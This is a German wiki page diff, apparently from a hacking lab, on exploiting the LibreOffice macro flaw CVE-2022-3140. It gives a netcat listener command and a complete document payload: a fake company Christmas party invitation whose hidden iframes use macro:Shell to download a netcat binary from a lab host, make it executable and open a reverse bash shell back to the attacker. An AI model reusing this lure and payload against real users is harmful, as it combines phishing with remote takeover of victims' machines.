LibreOffice Makrolücke Hack (CVE-2022-3140): Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
| Zeile 4: | Zeile 4: | ||
=Angreifer= | =Angreifer= | ||
*netcat -lp 4440 | *netcat -lp 4440 | ||
| + | =ODT erstellen= | ||
| + | ;Als embeeded HTML | ||
| + | <pre> | ||
| + | <HTML> | ||
| + | <MAIN> | ||
| + | Liebes Team,</br> | ||
| + | |||
| + | die Müller GmbH lädt Sie herzlich zur Weihnachtsfeier am 27. November im Restaurant Bella Italia ein! </br> | ||
| + | Anschließend möchten wir den Abend in der Weinbar am Marktplatz ausklingen lassen.</br> | ||
| + | Treffpunkt ist um 17:30 Uhr vor dem Restaurant.</br> | ||
| + | </br> | ||
| + | </br> | ||
| + | Bitte geben Sie uns bis zum 27. November Bescheid, ob wir mit Ihrem Kommen rechnen können.</br> | ||
| + | </br> | ||
| + | Wir freuen uns auf Sie!</br> | ||
| + | </br> | ||
| + | Ihre Geschäftsführung</br> | ||
| + | |||
| + | </br> | ||
| + | |||
| + | <img src="http://fex.tuxmen.de/dl/weihnachtsmann.jpg" "height="100" width="200"> | ||
| + | |||
| + | </br> | ||
| + | <iframe src='macro:Shell("curl" , 0 ,"http://xmen.local/dl/nc -o /tmp/nc",True)'></iframe> | ||
| + | </br> | ||
| + | <iframe src='macro:Shell("chmod", 0, "755 /tmp/nc" , True )'></iframe> | ||
| + | </br> | ||
| + | <iframe src='macro:Shell("/tmp/nc", 0, "-e /bin/bash xmen.local 4440", True)'></iframe> | ||
| + | </MAIN> | ||
| + | </HTML> | ||
| + | </pre> | ||
Version vom 24. Oktober 2022, 15:34 Uhr
Vorbereitung
- Vorausetzung
- Libre Office version vor 7.3.6
Angreifer
- netcat -lp 4440
ODT erstellen
- Als embeeded HTML
<HTML>
<MAIN>
Liebes Team,</br>
die Müller GmbH lädt Sie herzlich zur Weihnachtsfeier am 27. November im Restaurant Bella Italia ein! </br>
Anschließend möchten wir den Abend in der Weinbar am Marktplatz ausklingen lassen.</br>
Treffpunkt ist um 17:30 Uhr vor dem Restaurant.</br>
</br>
</br>
Bitte geben Sie uns bis zum 27. November Bescheid, ob wir mit Ihrem Kommen rechnen können.</br>
</br>
Wir freuen uns auf Sie!</br>
</br>
Ihre Geschäftsführung</br>
</br>
<img src="http://fex.tuxmen.de/dl/weihnachtsmann.jpg" "height="100" width="200">
</br>
<iframe src='macro:Shell("curl" , 0 ,"http://xmen.local/dl/nc -o /tmp/nc",True)'></iframe>
</br>
<iframe src='macro:Shell("chmod", 0, "755 /tmp/nc" , True )'></iframe>
</br>
<iframe src='macro:Shell("/tmp/nc", 0, "-e /bin/bash xmen.local 4440", True)'></iframe>
</MAIN>
</HTML>